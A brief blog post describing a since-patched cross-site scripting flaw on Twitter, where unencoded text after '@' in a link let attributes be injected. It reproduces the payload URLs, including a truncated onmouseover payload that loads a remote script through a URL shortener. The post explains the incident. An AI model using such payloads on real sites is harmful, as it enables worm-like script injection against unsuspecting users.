So Judofyr found a XSS-exploit on Twitter.com and within minutes it spreaded like wildfire. His original tweet just set the anchor background color to black but his next tweet included onmouseover and people could not stop moving the mouse over the tweet resulting in over 40000 tweets within 10 minutes.
The exploit:
http://judofyr.net/@"style="background:#000;color:#000;/
So Twitter does not encode the URL and whatever is after the @ gets included in the anchor. So css and javascript can be included.
Shortly after someone else created a more evil approach:
http://t.co/@"style="font-size:999999999999px;"onmouseover="$.getScript('http:u002fu002fis.gdu002ffl9A ...
Update: This exploit is now patched.
(Cross-posted @ Inspired? No)
